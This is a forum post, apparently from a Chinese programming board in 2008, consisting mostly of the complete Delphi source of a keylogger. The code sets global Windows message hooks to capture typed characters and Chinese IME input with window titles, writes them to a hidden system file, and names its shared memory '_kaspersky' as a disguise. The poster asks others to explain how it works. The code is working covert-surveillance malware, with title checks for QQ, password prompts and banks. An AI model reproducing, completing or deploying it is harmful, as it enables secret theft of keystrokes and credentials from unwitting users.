陈经韬的键盘记录(1分)

gfwlxx · 2008-12-05

unit Hook; {$DEFINE BankFiltrate} interface uses   Windows, Other; procedure StartHook(const SaveFileName: Pchar); stdcall; procedure StopHook; stdcall; implementation const {$IFDEF BankFiltrate}   BankInfo: string = '琼排'; {$ENDIF}   HookMemFileName: Pchar = '_kaspersky';   NULL = 0; type   TShared = record     strSaveFileName: array[0..1023] of char;     hGetMsgHook, hCallWndHook: THandle;   end; var   bFirstProcess: Bool;   hMappingFile: THandle;   PShared: ^TShared;   bFirst: Bool;   dwTick: DWORD;   bChange: Bool;   sOldCapText: array[0..255] of char; {$IFDEF BankFiltrate}   strBankInfo: string;   i: integer; {$ENDIF} function GetTopParent(hWndIn: HWND): HWND; var   hWndOut: HWND; begin   Result := hWndIn;   if (hWndIn = NULL) then Exit;   hWndOut := hWndIn;   while (hWndOut <> NULL) do   begin     hWndIn := hWndOut;     hWndOut := GetParent(hWndIn);   end;   Result := hWndIn; end; procedure SaveInfo(str: string); stdcall; var   h: integer; begin   if length(str) = 0 then exit;   SetFileAttributes(PShared^.strSaveFileName, FILE_ATTRIBUTE_NORMAL);   if fileexists(PShared^.strSaveFileName) then   begin     h := fileopen(PShared^.strSaveFileName, fmOpenWrite);     fileseek(h, 0, 2);   end   else h := filecreate(PShared^.strSaveFileName);   if h = -1 then exit;   FileWrite(h, str[1], length(str));   FileClose(h);   SetFileAttributes(PShared^.strSaveFileName, FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM); end; procedure HookProc(hWndIn: integer; uMessage: integer; wParam: WPARAM; lParam: LPARAM); stdcall; var   hMyWnd: HWND;   dwSize: DWORD;   hMyIMC: HIMC;   str: array[0..MAX_PATH] of char;   temp: array[0..255] of char; begin   hMyWnd := GetTopParent(hwndIn);  ///////////////////////////////////////   if (uMessage = WM_IME_COMPOSITION) then   begin     hMyIMC := ImmGetContext(hMyWnd); // 取得目前 thread 的 input context     if (lParam and GCS_RESULTSTR <> 0) then     begin       dwSize := ImmGetCompositionString(hMyIMC, GCS_RESULTSTR, @str[0], sizeof(str)); //取得汉字输入串       str[dwSize] := #0;       if ((GetTickCount() - dwTick) >= 50) then //防止word中重复记录，重复记录原因不明       begin         GetWindowText(hMyWnd, temp, sizeof(temp));         if StrComp(temp, sOldCapText) <> 0 then         begin StrCopy(sOldCapText, temp); bChange := True; end         else           bChange := False;         if (bFirst or bChange) then         begin           if (bChange) then SaveInfo(#13#10);           GetWindowText(hMyWnd, sOldCapText, sizeof(sOldCapText));           SaveInfo('(');           SaveInfo(sOldCapText);           SaveInfo(')');         end; {$IFDEF BankFiltrate}         if Pos('QQ 2005', temp) > 0 then ;         if Pos('密码:', temp) > 0 then ;         if Pos('Pass:', temp) > 0 then ;         if Pos(strBankInfo {'银行'}, temp) > 0 then SaveInfo('*')         else SaveInfo(str); {$ELSE}         SaveInfo(str); {$ENDIF}         bFirst := False;       end;       dwTick := GetTickCount();     end;     ImmReleaseContext(hMyWnd, hMyWnd);   end;  ////////////////////////////////////字符输入   if (uMessage = WM_CHAR) then   begin     if ((GetTickCount() - dwTick) >= 50) then     begin       GetWindowText(hMyWnd, temp, sizeof(temp));       if StrComp(temp, sOldCapText) <> 0 then       begin StrCopy(sOldCapText, temp); bChange := True; end       else         bChange := False;       if (bFirst or bChange) then       begin         if (bChange) then SaveInfo(#13#10);         GetWindowText(hMyWnd, sOldCapText, sizeof(sOldCapText));         SaveInfo('(');         SaveInfo(sOldCapText);         SaveInfo(')');       end; {$IFDEF BankFiltrate}       if Pos('QQ 2005', temp) > 0 then ;       if Pos('密码:', temp) > 0 then ;       if Pos('Pass:', temp) > 0 then ;       if Pos(strBankInfo {'银行'}, temp) > 0 then SaveInfo('*')       else SaveInfo(Char(wParam)); {$ELSE}       SaveInfo(Char(wParam)); {$ENDIF}       bFirst := False;     end;     dwTick := GetTickCount();   end; end; function GetMsgProc(nCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; var   pcs: PMSG;   hd, uMsg, wP, lP: integer; begin   pcs := PMSG(lParam);   if (nCode >= 0) and (pcs <> nil) and (pcs^.hwnd <> 0) then   begin     hd := pcs^.hwnd;     uMsg := pcs^.message;     wp := pcs^.wParam;     lp := pcs^.lParam;     HookProc(hd, uMsg, wp, lp);   end;   Result := CallNextHookEx(PShared^.hGetMsgHook, nCode, wParam, lParam); end; function CallWndProc(nCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; var   pcs: PCWPSTRUCT;   hd, uMsg, wP, lP: integer; begin   pcs := PCWPSTRUCT(lParam);   if (nCode >= 0) and (pcs <> nil) and (pcs^.hwnd <> 0) then   begin     hd := pcs^.hwnd;     uMsg := pcs^.message;     wp := pcs^.wParam;     lp := pcs^.lParam;     HookProc(hd, uMsg, wp, lp);   end;   Result := CallNextHookEx(PShared^.hCallWndHook, nCode, wParam, lParam); end; procedure StartHook(const SaveFileName: Pchar); stdcall; begin   bFirstProcess := True;   bFirst := True;   bChange := True;   dwTick := GetTickCount;   StrCopy(PShared^.strSaveFileName, SaveFileName);   if PShared^.hGetMsgHook = 0 then PShared^.hGetMsgHook := SetWindowsHookEx(WH_GETMESSAGE, @GetMsgProc, hinstance, 0);   if PShared^.hCallWndHook = 0 then   begin     PShared^.hCallWndHook := SetWindowsHookEx(WH_CALLWNDPROC, @CallWndProc, hinstance, 0);     if PShared^.hCallWndHook = 0 then UnhookWindowsHookEx(PShared^.hCallWndHook);   end; end; procedure StopHook; stdcall; begin   if PShared^.hGetMsgHook <> 0 then UnhookWindowsHookEx(PShared^.hGetMsgHook);   PShared^.hGetMsgHook := 0;   if PShared^.hCallWndHook <> 0 then UnhookWindowsHookEx(PShared^.hCallWndHook);   PShared^.hCallWndHook := 0; end; initialization   bFirstProcess := False;   //建立内存映象文件，用来保存全局变量   hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShared), HookMemFileName);   PShared := MapViewOfFile(hMappingFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0); {$IFDEF BankFiltrate}   strBankInfo := '';   for i := 1 to length(BankInfo) do strBankInfo := strBankInfo + chr(ord(BankInfo) + 11); {$ENDIF} finalization   try     if bFirstProcess then StopHook;     UnmapViewOfFile(PShared);     CloseHandle(hMappingFile);   except   end; end. 给个大致怎么完成键盘的过程,如果能给个详细注释更好!!

陈经韬的键盘记录(1分)

gfwlxx

Unregistered / Unconfirmed

Similar threads